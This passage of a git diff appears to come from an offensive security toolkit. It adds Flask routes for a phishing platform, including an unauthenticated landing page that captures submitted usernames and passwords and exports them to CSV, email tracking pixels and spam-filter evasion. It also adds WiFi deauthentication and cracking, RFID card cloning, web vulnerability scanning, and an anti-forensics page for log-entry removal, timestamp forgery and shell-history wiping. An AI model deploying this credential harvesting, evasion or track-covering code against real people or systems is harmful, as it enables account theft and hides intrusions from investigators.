_server().send_campaign(cid, base_url=base_url) + return jsonify(result) + + +@phishmail_bp.route('/campaigns/', methods=['DELETE']) +@login_required +def delete_campaign(cid): + if _server().campaigns.delete_campaign(cid): + return jsonify({'ok': True}) + return jsonify({'ok': False, 'error': 'Campaign not found'}) + + +# ── Templates ──────────────────────────────────────────────────────────────── + +@phishmail_bp.route('/templates', methods=['GET']) +@login_required +def list_templates(): + templates = _server().templates.list_templates() + return jsonify({'ok': True, 'templates': templates}) + + +@phishmail_bp.route('/templates', methods=['POST']) +@login_required +def save_template(): + data = request.get_json(silent=True) or {} + name = data.get('name', '').strip() + if not name: + return jsonify({'ok': False, 'error': 'Template name required'}) + _server().templates.save_template( + name, data.get('html', ''), data.get('text', ''), + data.get('subject', '')) + return jsonify({'ok': True}) + + +@phishmail_bp.route('/templates/', methods=['DELETE']) +@login_required +def delete_template(name): + if _server().templates.delete_template(name): + return jsonify({'ok': True}) + return jsonify({'ok': False, 'error': 'Template not found or is built-in'}) + + +# ── SMTP Relay ─────────────────────────────────────────────────────────────── + +@phishmail_bp.route('/server/start', methods=['POST']) +@login_required +def server_start(): + data = request.get_json(silent=True) or {} + host = data.get('host', '0.0.0.0') + port = int(data.get('port', 2525)) + result = _server().start_relay(host, port) + return jsonify(result) + + +@phishmail_bp.route('/server/stop', methods=['POST']) +@login_required +def server_stop(): + result = _server().stop_relay() + return jsonify(result) + + +@phishmail_bp.route('/server/status', methods=['GET']) +@login_required +def server_status(): + return jsonify(_server().relay_status()) + + +# ── Certificate Generation ─────────────────────────────────────────────────── + +@phishmail_bp.route('/cert/generate', methods=['POST']) +@login_required +def cert_generate(): + data = request.get_json(silent=True) or {} + result = _server().generate_cert( + cn=data.get('cn', 'mail.example.com'), + org=data.get('org', 'Example Inc'), + ou=data.get('ou', ''), + locality=data.get('locality', ''), + state=data.get('state', ''), + country=data.get('country', 'US'), + days=int(data.get('days', 365)), + ) + return jsonify(result) + + +@phishmail_bp.route('/cert/list', methods=['GET']) +@login_required +def cert_list(): + return jsonify({'ok': True, 'certs': _server().list_certs()}) + + +# ── SMTP Connection Test ──────────────────────────────────────────────────── + +@phishmail_bp.route('/test', methods=['POST']) +@login_required +def test_smtp(): + data = request.get_json(silent=True) or {} + host = data.get('host', '') + port = int(data.get('port', 25)) + if not host: + return jsonify({'ok': False, 'error': 'Host required'}) + result = _server().test_smtp(host, port) + return jsonify(result) + + +# ── Tracking (no auth — accessed by email clients) ────────────────────────── + +# 1x1 transparent GIF +_PIXEL_GIF = base64.b64decode( + 'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7') + + +@phishmail_bp.route('/track/pixel//') +def track_pixel(campaign, target): + """Tracking pixel — records email open.""" + try: + _server().campaigns.record_open(campaign, target) + except Exception: + pass + return Response(_PIXEL_GIF, mimetype='image/gif', + headers={'Cache-Control': 'no-store, no-cache'}) + + +@phishmail_bp.route('/track/click///') +def track_click(campaign, target, link_data): + """Click tracking — records click and redirects.""" + try: + _server().campaigns.record_click(campaign, target) + except Exception: + pass + + # Decode original URL + try: + original_url = base64.urlsafe_b64decode(link_data).decode() + except Exception: + original_url = '/' + + return redirect(original_url) + + +# ── Landing Pages / Credential Harvesting ───────────────────────────────── + +@phishmail_bp.route('/landing-pages', methods=['GET']) +@login_required +def list_landing_pages(): + return jsonify({'ok': True, 'pages': _server().landing_pages.list_pages()}) + + +@phishmail_bp.route('/landing-pages', methods=['POST']) +@login_required +def create_landing_page(): + data = request.get_json(silent=True) or {} + name = data.get('name', '').strip() + html = data.get('html', '') + if not name: + return jsonify({'ok': False, 'error': 'Name required'}) + pid = _server().landing_pages.create_page( + name, html, + redirect_url=data.get('redirect_url', ''), + fields=data.get('fields', ['username', 'password'])) + return jsonify({'ok': True, 'id': pid}) + + +@phishmail_bp.route('/landing-pages/', methods=['GET']) +@login_required +def get_landing_page(pid): + page = _server().landing_pages.get_page(pid) + if not page: + return jsonify({'ok': False, 'error': 'Page not found'}) + return jsonify({'ok': True, 'page': page}) + + +@phishmail_bp.route('/landing-pages/', methods=['DELETE']) +@login_required +def delete_landing_page(pid): + if _server().landing_pages.delete_page(pid): + return jsonify({'ok': True}) + return jsonify({'ok': False, 'error': 'Page not found or is built-in'}) + + +@phishmail_bp.route('/landing-pages//preview') +@login_required +def preview_landing_page(pid): + html = _server().landing_pages.render_page(pid, 'preview', 'preview', 'user@example.com') + if not html: + return 'Page not found', 404 + return html + + +# Landing page capture endpoints (NO AUTH — accessed by phish targets) +@phishmail_bp.route('/lp/', methods=['GET', 'POST']) +def landing_page_serve(page_id): + """Serve a landing page and capture credentials on POST.""" + server = _server() + if request.method == 'GET': + campaign = request.args.get('c', '') + target = request.args.get('t', '') + email = request.args.get('e', '') + html = server.landing_pages.render_page(page_id, campaign, target, email) + if not html: + return 'Not found', 404 + return html + + # POST — capture credentials + form_data = dict(request.form) + req_info = { + 'ip': request.remote_addr, + 'user_agent': request.headers.get('User-Agent', ''), + 'referer': request.headers.get('Referer', ''), + } + capture = server.landing_pages.record_capture(page_id, form_data, req_info) + + # Also update campaign tracking if campaign/target provided + campaign = form_data.get('_campaign', '') + target = form_data.get('_target', '') + if campaign and target: + try: + server.campaigns.record_click(campaign, target) + except Exception: + pass + + # Redirect to configured URL or generic "success" page + page = server.landing_pages.get_page(page_id) + redirect_url = (page or {}).get('redirect_url', '') + if redirect_url: + return redirect(redirect_url) + return """Success +

Authentication Successful

+

You will be redirected shortly...

""" + + +@phishmail_bp.route('/captures', methods=['GET']) +@login_required +def list_captures(): + campaign = request.args.get('campaign', '') + page = request.args.get('page', '') + captures = _server().landing_pages.get_captures(campaign, page) + return jsonify({'ok': True, 'captures': captures}) + + +@phishmail_bp.route('/captures', methods=['DELETE']) +@login_required +def clear_captures(): + campaign = request.args.get('campaign', '') + count = _server().landing_pages.clear_captures(campaign) + return jsonify({'ok': True, 'cleared': count}) + + +@phishmail_bp.route('/captures/export') +@login_required +def export_captures(): + campaign = request.args.get('campaign', '') + captures = _server().landing_pages.get_captures(campaign) + # CSV export + import io, csv + output = io.StringIO() + writer = csv.writer(output) + writer.writerow(['timestamp', 'campaign', 'target', 'ip', 'user_agent', 'credentials']) + for c in captures: + creds_str = '; '.join(f"{k}={v}" for k, v in c.get('credentials', {}).items()) + writer.writerow([c.get('timestamp', ''), c.get('campaign', ''), + c.get('target', ''), c.get('ip', ''), + c.get('user_agent', ''), creds_str]) + return Response(output.getvalue(), mimetype='text/csv', + headers={'Content-Disposition': f'attachment;filename=captures_{campaign or "all"}.csv'}) + + +# ── Campaign enhancements ───────────────────────────────────────────────── + +@phishmail_bp.route('/campaigns//export') +@login_required +def export_campaign(cid): + """Export campaign results as CSV.""" + import io, csv + camp = _server().campaigns.get_campaign(cid) + if not camp: + return jsonify({'ok': False, 'error': 'Campaign not found'}) + output = io.StringIO() + writer = csv.writer(output) + writer.writerow(['email', 'target_id', 'status', 'sent_at', 'opened_at', 'clicked_at']) + for t in camp.get('targets', []): + writer.writerow([t['email'], t['id'], t.get('status', ''), + t.get('sent_at', ''), t.get('opened_at', ''), + t.get('clicked_at', '')]) + return Response(output.getvalue(), mimetype='text/csv', + headers={'Content-Disposition': f'attachment;filename=campaign_{cid}.csv'}) + + +@phishmail_bp.route('/campaigns/import-targets', methods=['POST']) +@login_required +def import_targets_csv(): + """Import targets from CSV (email per line, or CSV with email column).""" + data = request.get_json(silent=True) or {} + csv_text = data.get('csv', '') + if not csv_text: + return jsonify({'ok': False, 'error': 'CSV data required'}) + + import io, csv + reader = csv.reader(io.StringIO(csv_text)) + emails = [] + for row in reader: + if not row: + continue + # Try to find email in each column + for cell in row: + cell = cell.strip() + if '@' in cell and '.' in cell: + emails.append(cell) + break + else: + # If no email found, treat first column as raw email + val = row[0].strip() + if val and not val.startswith('#'): + emails.append(val) + + # Deduplicate + seen = set() + unique = [] + for e in emails: + if e.lower() not in seen: + seen.add(e.lower()) + unique.append(e) + + return jsonify({'ok': True, 'emails': unique, 'count': len(unique)}) + + +# ── DKIM ────────────────────────────────────────────────────────────────── + +@phishmail_bp.route('/dkim/generate', methods=['POST']) +@login_required +def dkim_generate(): + data = request.get_json(silent=True) or {} + domain = data.get('domain', '').strip() + if not domain: + return jsonify({'ok': False, 'error': 'Domain required'}) + return jsonify(_server().dkim.generate_keypair(domain)) + + +@phishmail_bp.route('/dkim/keys', methods=['GET']) +@login_required +def dkim_list(): + return jsonify({'ok': True, 'keys': _server().dkim.list_keys()}) + + +# ── DNS Auto-Setup ──────────────────────────────────────────────────────── + +@phishmail_bp.route('/dns-setup', methods=['POST']) +@login_required +def dns_setup(): + data = request.get_json(silent=True) or {} + domain = data.get('domain', '').strip() + if not domain: + return jsonify({'ok': False, 'error': 'Domain required'}) + return jsonify(_server().setup_dns_for_domain( + domain, + mail_host=data.get('mail_host', ''), + spf_allow=data.get('spf_allow', ''))) + + +@phishmail_bp.route('/dns-status', methods=['GET']) +@login_required +def dns_check(): + return jsonify(_server().dns_status()) + + +# ── Evasion Preview ────────────────────────────────────────────────────── + +@phishmail_bp.route('/evasion/preview', methods=['POST']) +@login_required +def evasion_preview(): + data = request.get_json(silent=True) or {} + text = data.get('text', '') + mode = data.get('mode', 'homoglyph') + from modules.phishmail import EmailEvasion + ev = EmailEvasion() + if mode == 'homoglyph': + result = ev.homoglyph_text(text) + elif mode == 'zero_width': + result = ev.zero_width_insert(text) + elif mode == 'html_entity': + result = ev.html_entity_encode(text) + elif mode == 'random_headers': + result = ev.randomize_headers() + return jsonify({'ok': True, 'headers': result}) + else: + result = text + return jsonify({'ok': True, 'result': result}) diff --git a/web/routes/report_engine.py b/web/routes/report_engine.py new file mode 100644 index 0000000..de980e5 --- /dev/null +++ b/web/routes/report_engine.py @@ -0,0 +1,108 @@ +"""Reporting Engine — web routes for pentest report management.""" + +from flask import Blueprint, render_template, request, jsonify, Response +from web.auth import login_required + +report_engine_bp = Blueprint('report_engine', __name__) + + +def _svc(): + from modules.report_engine import get_report_engine + return get_report_engine() + + +@report_engine_bp.route('/reports/') +@login_required +def index(): + return render_template('report_engine.html') + + +@report_engine_bp.route('/reports/list', methods=['GET']) +@login_required +def list_reports(): + return jsonify({'ok': True, 'reports': _svc().list_reports()}) + + +@report_engine_bp.route('/reports/create', methods=['POST']) +@login_required +def create_report(): + data = request.get_json(silent=True) or {} + return jsonify(_svc().create_report( + title=data.get('title', 'Untitled Report'), + client=data.get('client', ''), + scope=data.get('scope', ''), + methodology=data.get('methodology', ''), + )) + + +@report_engine_bp.route('/reports/', methods=['GET']) +@login_required +def get_report(report_id): + r = _svc().get_report(report_id) + if not r: + return jsonify({'ok': False, 'error': 'Report not found'}) + return jsonify({'ok': True, 'report': r}) + + +@report_engine_bp.route('/reports/', methods=['PUT']) +@login_required +def update_report(report_id): + data = request.get_json(silent=True) or {} + return jsonify(_svc().update_report(report_id, data)) + + +@report_engine_bp.route('/reports/', methods=['DELETE']) +@login_required +def delete_report(report_id): + return jsonify(_svc().delete_report(report_id)) + + +@report_engine_bp.route('/reports//findings', methods=['POST']) +@login_required +def add_finding(report_id): + data = request.get_json(silent=True) or {} + return jsonify(_svc().add_finding(report_id, data)) + + +@report_engine_bp.route('/reports//findings/', methods=['PUT']) +@login_required +def update_finding(report_id, finding_id): + data = request.get_json(silent=True) or {} + return jsonify(_svc().update_finding(report_id, finding_id, data)) + + +@report_engine_bp.route('/reports//findings/', methods=['DELETE']) +@login_required +def delete_finding(report_id, finding_id): + return jsonify(_svc().delete_finding(report_id, finding_id)) + + +@report_engine_bp.route('/reports/templates', methods=['GET']) +@login_required +def finding_templates(): + return jsonify({'ok': True, 'templates': _svc().get_finding_templates()}) + + +@report_engine_bp.route('/reports//export/', methods=['GET']) +@login_required +def export_report(report_id, fmt): + svc = _svc() + if fmt == 'html': + content = svc.export_html(report_id) + if not content: + return jsonify({'ok': False, 'error': 'Report not found'}) + return Response(content, mimetype='text/html', + headers={'Content-Disposition': f'attachment; filename=report_{report_id}.html'}) + elif fmt == 'markdown': + content = svc.export_markdown(report_id) + if not content: + return jsonify({'ok': False, 'error': 'Report not found'}) + return Response(content, mimetype='text/markdown', + headers={'Content-Disposition': f'attachment; filename=report_{report_id}.md'}) + elif fmt == 'json': + content = svc.export_json(report_id) + if not content: + return jsonify({'ok': False, 'error': 'Report not found'}) + return Response(content, mimetype='application/json', + headers={'Content-Disposition': f'attachment; filename=report_{report_id}.json'}) + return jsonify({'ok': False, 'error': 'Invalid format'}) diff --git a/web/routes/rfid_tools.py b/web/routes/rfid_tools.py new file mode 100644 index 0000000..3f146fb --- /dev/null +++ b/web/routes/rfid_tools.py @@ -0,0 +1,90 @@ +"""RFID/NFC Tools routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +rfid_tools_bp = Blueprint('rfid_tools', __name__, url_prefix='/rfid') + +def _get_mgr(): + from modules.rfid_tools import get_rfid_manager + return get_rfid_manager() + +@rfid_tools_bp.route('/') +@login_required +def index(): + return render_template('rfid_tools.html') + +@rfid_tools_bp.route('/tools') +@login_required +def tools_status(): + return jsonify(_get_mgr().get_tools_status()) + +@rfid_tools_bp.route('/lf/search', methods=['POST']) +@login_required +def lf_search(): + return jsonify(_get_mgr().lf_search()) + +@rfid_tools_bp.route('/lf/read/em410x', methods=['POST']) +@login_required +def lf_read_em(): + return jsonify(_get_mgr().lf_read_em410x()) + +@rfid_tools_bp.route('/lf/clone', methods=['POST']) +@login_required +def lf_clone(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().lf_clone_em410x(data.get('card_id', ''))) + +@rfid_tools_bp.route('/lf/sim', methods=['POST']) +@login_required +def lf_sim(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().lf_sim_em410x(data.get('card_id', ''))) + +@rfid_tools_bp.route('/hf/search', methods=['POST']) +@login_required +def hf_search(): + return jsonify(_get_mgr().hf_search()) + +@rfid_tools_bp.route('/hf/dump', methods=['POST']) +@login_required +def hf_dump(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().hf_dump_mifare(data.get('keys_file'))) + +@rfid_tools_bp.route('/hf/clone', methods=['POST']) +@login_required +def hf_clone(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().hf_clone_mifare(data.get('dump_file', ''))) + +@rfid_tools_bp.route('/nfc/scan', methods=['POST']) +@login_required +def nfc_scan(): + return jsonify(_get_mgr().nfc_scan()) + +@rfid_tools_bp.route('/cards', methods=['GET', 'POST', 'DELETE']) +@login_required +def cards(): + mgr = _get_mgr() + if request.method == 'POST': + data = request.get_json(silent=True) or {} + return jsonify(mgr.save_card(data.get('card', {}), data.get('name'))) + elif request.method == 'DELETE': + data = request.get_json(silent=True) or {} + return jsonify(mgr.delete_card(data.get('index', -1))) + return jsonify(mgr.get_saved_cards()) + +@rfid_tools_bp.route('/dumps') +@login_required +def dumps(): + return jsonify(_get_mgr().list_dumps()) + +@rfid_tools_bp.route('/keys') +@login_required +def default_keys(): + return jsonify(_get_mgr().get_default_keys()) + +@rfid_tools_bp.route('/types') +@login_required +def card_types(): + return jsonify(_get_mgr().get_card_types()) diff --git a/web/routes/steganography.py b/web/routes/steganography.py new file mode 100644 index 0000000..ce3ee88 --- /dev/null +++ b/web/routes/steganography.py @@ -0,0 +1,96 @@ +"""Steganography routes.""" +import os +import base64 +from flask import Blueprint, request, jsonify, render_template, current_app +from web.routes.auth_routes import login_required + +steganography_bp = Blueprint('steganography', __name__, url_prefix='/stego') + +def _get_mgr(): + from modules.steganography import get_stego_manager + return get_stego_manager() + +@steganography_bp.route('/') +@login_required +def index(): + return render_template('steganography.html') + +@steganography_bp.route('/capabilities') +@login_required +def capabilities(): + return jsonify(_get_mgr().get_capabilities()) + +@steganography_bp.route('/capacity', methods=['POST']) +@login_required +def capacity(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().capacity(data.get('file', ''))) + +@steganography_bp.route('/hide', methods=['POST']) +@login_required +def hide(): + mgr = _get_mgr() + # Support file upload or path-based + if request.content_type and 'multipart' in request.content_type: + carrier = request.files.get('carrier') + if not carrier: + return jsonify({'ok': False, 'error': 'No carrier file'}) + upload_dir = current_app.config.get('UPLOAD_FOLDER', '/tmp') + carrier_path = os.path.join(upload_dir, carrier.filename) + carrier.save(carrier_path) + message = request.form.get('message', '') + password = request.form.get('password') or None + output_path = os.path.join(upload_dir, f'stego_{carrier.filename}') + result = mgr.hide(carrier_path, message.encode(), output_path, password) + else: + data = request.get_json(silent=True) or {} + carrier_path = data.get('carrier', '') + message = data.get('message', '') + password = data.get('password') or None + output = data.get('output') + result = mgr.hide(carrier_path, message.encode(), output, password) + return jsonify(result) + +@steganography_bp.route('/extract', methods=['POST']) +@login_required +def extract(): + data = request.get_json(silent=True) or {} + result = _get_mgr().extract(data.get('file', ''), data.get('password')) + if result.get('ok') and 'data' in result: + try: + result['text'] = result['data'].decode('utf-8') + except (UnicodeDecodeError, AttributeError): + result['base64'] = base64.b64encode(result['data']).decode() + del result['data'] # Don't send raw bytes in JSON + return jsonify(result) + +@steganography_bp.route('/detect', methods=['POST']) +@login_required +def detect(): + data = request.get_json(silent=True) or {} + return jsonify(_get_mgr().detect(data.get('file', ''))) + +@steganography_bp.route('/whitespace/hide', methods=['POST']) +@login_required +def whitespace_hide(): + data = request.get_json(silent=True) or {} + from modules.steganography import DocumentStego + result = DocumentStego.hide_whitespace( + data.get('text', ''), data.get('message', '').encode(), + data.get('password') + ) + return jsonify(result) + +@steganography_bp.route('/whitespace/extract', methods=['POST']) +@login_required +def whitespace_extract(): + data = request.get_json(silent=True) or {} + from modules.steganography import DocumentStego + result = DocumentStego.extract_whitespace(data.get('text', ''), data.get('password')) + if result.get('ok') and 'data' in result: + try: + result['text'] = result['data'].decode('utf-8') + except (UnicodeDecodeError, AttributeError): + result['base64'] = base64.b64encode(result['data']).decode() + del result['data'] + return jsonify(result) diff --git a/web/routes/threat_intel.py b/web/routes/threat_intel.py new file mode 100644 index 0000000..a53aa36 --- /dev/null +++ b/web/routes/threat_intel.py @@ -0,0 +1,125 @@ +"""Threat Intelligence routes.""" +from flask import Blueprint, request, jsonify, render_template, Response +from web.routes.auth_routes import login_required + +threat_intel_bp = Blueprint('threat_intel', __name__, url_prefix='/threat-intel') + +def _get_engine(): + from modules.threat_intel import get_threat_intel + return get_threat_intel() + +@threat_intel_bp.route('/') +@login_required +def index(): + return render_template('threat_intel.html') + +@threat_intel_bp.route('/iocs', methods=['GET', 'POST', 'DELETE']) +@login_required +def iocs(): + engine = _get_engine() + if request.method == 'POST': + data = request.get_json(silent=True) or {} + return jsonify(engine.add_ioc( + value=data.get('value', ''), + ioc_type=data.get('ioc_type'), + source=data.get('source', 'manual'), + tags=data.get('tags', []), + severity=data.get('severity', 'unknown'), + description=data.get('description', ''), + reference=data.get('reference', '') + )) + elif request.method == 'DELETE': + data = request.get_json(silent=True) or {} + return jsonify(engine.remove_ioc(data.get('id', ''))) + else: + return jsonify(engine.get_iocs( + ioc_type=request.args.get('type'), + source=request.args.get('source'), + severity=request.args.get('severity'), + search=request.args.get('search') + )) + +@threat_intel_bp.route('/iocs/import', methods=['POST']) +@login_required +def import_iocs(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().bulk_import( + data.get('text', ''), source=data.get('source', 'import'), + ioc_type=data.get('ioc_type') + )) + +@threat_intel_bp.route('/iocs/export') +@login_required +def export_iocs(): + fmt = request.args.get('format', 'json') + ioc_type = request.args.get('type') + content = _get_engine().export_iocs(fmt=fmt, ioc_type=ioc_type) + ct = {'csv': 'text/csv', 'stix': 'application/json', 'json': 'application/json'}.get(fmt, 'text/plain') + return Response(content, mimetype=ct, headers={'Content-Disposition': f'attachment; filename=iocs.{fmt}'}) + +@threat_intel_bp.route('/iocs/detect') +@login_required +def detect_type(): + value = request.args.get('value', '') + return jsonify({'type': _get_engine().detect_ioc_type(value)}) + +@threat_intel_bp.route('/stats') +@login_required +def stats(): + return jsonify(_get_engine().get_stats()) + +@threat_intel_bp.route('/feeds', methods=['GET', 'POST', 'DELETE']) +@login_required +def feeds(): + engine = _get_engine() + if request.method == 'POST': + data = request.get_json(silent=True) or {} + return jsonify(engine.add_feed( + name=data.get('name', ''), feed_type=data.get('feed_type', ''), + url=data.get('url', ''), api_key=data.get('api_key', ''), + interval_hours=data.get('interval_hours', 24) + )) + elif request.method == 'DELETE': + data = request.get_json(silent=True) or {} + return jsonify(engine.remove_feed(data.get('id', ''))) + return jsonify(engine.get_feeds()) + +@threat_intel_bp.route('/feeds//fetch', methods=['POST']) +@login_required +def fetch_feed(feed_id): + return jsonify(_get_engine().fetch_feed(feed_id)) + +@threat_intel_bp.route('/lookup/virustotal', methods=['POST']) +@login_required +def lookup_vt(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().lookup_virustotal(data.get('value', ''), data.get('api_key', ''))) + +@threat_intel_bp.route('/lookup/abuseipdb', methods=['POST']) +@login_required +def lookup_abuse(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().lookup_abuseipdb(data.get('ip', ''), data.get('api_key', ''))) + +@threat_intel_bp.route('/correlate/network', methods=['POST']) +@login_required +def correlate_network(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().correlate_network(data.get('connections', []))) + +@threat_intel_bp.route('/blocklist') +@login_required +def blocklist(): + return Response( + _get_engine().generate_blocklist( + fmt=request.args.get('format', 'plain'), + ioc_type=request.args.get('type', 'ip'), + min_severity=request.args.get('min_severity', 'low') + ), + mimetype='text/plain' + ) + +@threat_intel_bp.route('/alerts') +@login_required +def alerts(): + return jsonify(_get_engine().get_alerts(int(request.args.get('limit', 100)))) diff --git a/web/routes/webapp_scanner.py b/web/routes/webapp_scanner.py new file mode 100644 index 0000000..559f7ca --- /dev/null +++ b/web/routes/webapp_scanner.py @@ -0,0 +1,79 @@ +"""Web Application Scanner — web routes.""" + +from flask import Blueprint, render_template, request, jsonify +from web.auth import login_required + +webapp_scanner_bp = Blueprint('webapp_scanner', __name__) + + +def _svc(): + from modules.webapp_scanner import get_webapp_scanner + return get_webapp_scanner() + + +@webapp_scanner_bp.route('/web-scanner/') +@login_required +def index(): + return render_template('webapp_scanner.html') + + +@webapp_scanner_bp.route('/web-scanner/quick', methods=['POST']) +@login_required +def quick_scan(): + data = request.get_json(silent=True) or {} + url = data.get('url', '').strip() + if not url: + return jsonify({'ok': False, 'error': 'URL required'}) + return jsonify({'ok': True, **_svc().quick_scan(url)}) + + +@webapp_scanner_bp.route('/web-scanner/dirbust', methods=['POST']) +@login_required +def dir_bruteforce(): + data = request.get_json(silent=True) or {} + url = data.get('url', '').strip() + if not url: + return jsonify({'ok': False, 'error': 'URL required'}) + extensions = data.get('extensions', []) + return jsonify(_svc().dir_bruteforce(url, extensions=extensions or None, + threads=data.get('threads', 10))) + + +@webapp_scanner_bp.route('/web-scanner/dirbust/', methods=['GET']) +@login_required +def dirbust_status(job_id): + return jsonify(_svc().get_job_status(job_id)) + + +@webapp_scanner_bp.route('/web-scanner/subdomain', methods=['POST']) +@login_required +def subdomain_enum(): + data = request.get_json(silent=True) or {} + domain = data.get('domain', '').strip() + if not domain: + return jsonify({'ok': False, 'error': 'Domain required'}) + return jsonify(_svc().subdomain_enum(domain, use_ct=data.get('use_ct', True))) + + +@webapp_scanner_bp.route('/web-scanner/vuln', methods=['POST']) +@login_required +def vuln_scan(): + data = request.get_json(silent=True) or {} + url = data.get('url', '').strip() + if not url: + return jsonify({'ok': False, 'error': 'URL required'}) + return jsonify(_svc().vuln_scan(url, + scan_sqli=data.get('sqli', True), + scan_xss=data.get('xss', True))) + + +@webapp_scanner_bp.route('/web-scanner/crawl', methods=['POST']) +@login_required +def crawl(): + data = request.get_json(silent=True) or {} + url = data.get('url', '').strip() + if not url: + return jsonify({'ok': False, 'error': 'URL required'}) + return jsonify(_svc().crawl(url, + max_pages=data.get('max_pages', 50), + depth=data.get('depth', 3))) diff --git a/web/routes/wifi_audit.py b/web/routes/wifi_audit.py new file mode 100644 index 0000000..04885ed --- /dev/null +++ b/web/routes/wifi_audit.py @@ -0,0 +1,137 @@ +"""WiFi Auditing routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +wifi_audit_bp = Blueprint('wifi_audit', __name__, url_prefix='/wifi') + +def _get_auditor(): + from modules.wifi_audit import get_wifi_auditor + return get_wifi_auditor() + +@wifi_audit_bp.route('/') +@login_required +def index(): + return render_template('wifi_audit.html') + +@wifi_audit_bp.route('/tools') +@login_required +def tools_status(): + return jsonify(_get_auditor().get_tools_status()) + +@wifi_audit_bp.route('/interfaces') +@login_required +def interfaces(): + return jsonify(_get_auditor().get_interfaces()) + +@wifi_audit_bp.route('/monitor/enable', methods=['POST']) +@login_required +def monitor_enable(): + data = request.get_json(silent=True) or {} + return jsonify(_get_auditor().enable_monitor(data.get('interface', ''))) + +@wifi_audit_bp.route('/monitor/disable', methods=['POST']) +@login_required +def monitor_disable(): + data = request.get_json(silent=True) or {} + return jsonify(_get_auditor().disable_monitor(data.get('interface'))) + +@wifi_audit_bp.route('/scan', methods=['POST']) +@login_required +def scan(): + data = request.get_json(silent=True) or {} + return jsonify(_get_auditor().scan_networks( + interface=data.get('interface'), + duration=data.get('duration', 15) + )) + +@wifi_audit_bp.route('/scan/results') +@login_required +def scan_results(): + return jsonify(_get_auditor().get_scan_results()) + +@wifi_audit_bp.route('/deauth', methods=['POST']) +@login_required +def deauth(): + data = request.get_json(silent=True) or {} + return jsonify(_get_auditor().deauth( + interface=data.get('interface'), + bssid=data.get('bssid', ''), + client=data.get('client'), + count=data.get('count', 10) + )) + +@wifi_audit_bp.route('/handshake', methods=['POST']) +@login_required +def capture_handshake(): + data = request.get_json(silent=True) or {} + a = _get_auditor() + job_id = a.capture_handshake( + interface=data.get('interface', a.monitor_interface or ''), + bssid=data.get('bssid', ''), + channel=data.get('channel', 1), + deauth_count=data.get('deauth_count', 5), + timeout=data.get('timeout', 60) + ) + return jsonify({'ok': True, 'job_id': job_id}) + +@wifi_audit_bp.route('/crack', methods=['POST']) +@login_required +def crack(): + data = request.get_json(silent=True) or {} + job_id = _get_auditor().crack_handshake( + data.get('capture_file', ''), data.get('wordlist', ''), data.get('bssid') + ) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + +@wifi_audit_bp.route('/wps/scan', methods=['POST']) +@login_required +def wps_scan(): + data = request.get_json(silent=True) or {} + return jsonify(_get_auditor().wps_scan(data.get('interface'))) + +@wifi_audit_bp.route('/wps/attack', methods=['POST']) +@login_required +def wps_attack(): + data = request.get_json(silent=True) or {} + a = _get_auditor() + job_id = a.wps_attack( + interface=data.get('interface', a.monitor_interface or ''), + bssid=data.get('bssid', ''), + channel=data.get('channel', 1), + pixie_dust=data.get('pixie_dust', True) + ) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + +@wifi_audit_bp.route('/rogue/save', methods=['POST']) +@login_required +def rogue_save(): + return jsonify(_get_auditor().save_known_aps()) + +@wifi_audit_bp.route('/rogue/detect') +@login_required +def rogue_detect(): + return jsonify(_get_auditor().detect_rogue_aps()) + +@wifi_audit_bp.route('/capture/start', methods=['POST']) +@login_required +def capture_start(): + data = request.get_json(silent=True) or {} + return jsonify(_get_auditor().start_capture( + data.get('interface'), data.get('channel'), data.get('bssid'), data.get('name') + )) + +@wifi_audit_bp.route('/capture/stop', methods=['POST']) +@login_required +def capture_stop(): + return jsonify(_get_auditor().stop_capture()) + +@wifi_audit_bp.route('/captures') +@login_required +def captures_list(): + return jsonify(_get_auditor().list_captures()) + +@wifi_audit_bp.route('/job/') +@login_required +def job_status(job_id): + job = _get_auditor().get_job(job_id) + return jsonify(job or {'error': 'Job not found'}) diff --git a/web/templates/anti_forensics.html b/web/templates/anti_forensics.html new file mode 100644 index 0000000..f8577d3 --- /dev/null +++ b/web/templates/anti_forensics.html @@ -0,0 +1,408 @@ +{% extends "base.html" %} +{% block title %}AUTARCH — Anti-Forensics{% endblock %} + +{% block content %} +
+

Anti-Forensics

+

+ Secure deletion, timestamp manipulation, and log sanitization. +

+
+ + +
+ + + +
+ + +
+ +
+

Secure Delete File

+

+ Overwrite and delete a file so it cannot be recovered by forensic tools. +

+
+
+ + +
+
+ + +
+
+ + +
+
+
+ +
+ 

+

+
+

+    
Secure Delete Directory

+    

+        Recursively overwrite and delete all files in a directory.
+    

+    

+        

+            
+            
+        

+    

+    

+        
+    

+    

+        
+    

+    

+

+
+

+    
Wipe Free Space

+    

+        Overwrite all free space on a mount point to prevent recovery of previously deleted files.
+    

+    

+        
+        
+    

+    

+

+
+

+
+
+

+
+

+    
View Timestamps

+    

+        
+        
+    

+    
+        
+            
+            
+            
+        
+    
Accessed--
Modified--
Created--

+

+
+

+    
Set Timestamps

+    

+        Set a specific date/time for a file's access and modification timestamps.
+    

+    

+        

+            
+            
+        

+        

+            
+            
+        

+    

+    

+        
+    

+    

+

+
+

+    
Clone Timestamps

+    

+        Copy timestamps from a source file to a target file.
+    

+    

+        

+            
+            
+        

+        

+            
+            
+        

+    

+    

+        
+    

+    

+

+
+

+    
Randomize Timestamps

+    

+        Set random plausible timestamps on a file to confuse forensic timeline analysis.
+    

+    

+        
+        
+    

+    

+

+
+

+
+
+

+
+

+    
System Logs

+    

+        
+    

+    
+        
+        
+            
+        
+    
Log FileSizeWritableAction
Click Refresh to scan system log files.

+

+
+

+    
Remove Matching Entries

+    

+        Remove lines matching a regex pattern from a log file.
+    

+    

+        

+            
+            
+        

+        

+            
+            
+        

+    

+    

+        
+    

+    

+

+
+

+    
Quick Actions

+    

+        

+            
Clear Shell History

+            
Erase bash, zsh, and fish shell history for the current user.

+            
+            

+        

+        

